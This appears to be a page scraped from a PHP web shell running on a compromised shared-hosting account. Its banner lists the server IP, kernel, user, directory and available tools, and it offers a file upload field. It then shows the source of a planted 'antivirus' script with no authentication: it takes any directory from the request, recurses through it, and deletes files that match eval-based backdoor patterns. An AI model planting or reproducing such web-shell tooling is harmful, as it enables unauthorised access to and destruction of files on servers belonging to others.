Server IP : 162.0.215.126 / Your IP : 216.73.216.4 Web Server : LiteSpeed System : Linux business105.web-hosting.com 4.18.0-553.50.1.lve.el8.x86_64 #1 SMP Thu Apr 17 19:10:24 UTC 2025 x86_64 User : tektomgb ( 586) PHP Version : 8.1.32 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/tektomgb/tektk77toto.us/ |
Upload File : |
<?php header("Content-Type: text/html;charset=utf-8"); set_time_limit(0); ini_set('max_execution_time', 0); @ini_set('disable_functions', 'NONE'); $path = isset($_REQUEST['path']) ? $_REQUEST['path'] : $_SERVER['DOCUMENT_ROOT'].'/'; antivirus($path); function antivirus($dir){ $scandir = scandir($dir); foreach($scandir as $file){ $path = $dir.'/'.$file; $path = str_replace('//', '/', $path); if($file == '.' || $file == '..') continue; if(@is_link($path)) continue; if(@is_dir($path)){ if(is_readable($path)) antivirus($path); }else{ $del = 0; $y = file_get_contents($path); if(strstr($y, 'eval($') && strstr($y, '= ${ $')){ $del = 1; echo $path."<br>"; } if($del == 1){ unlink($path); } } } } ?>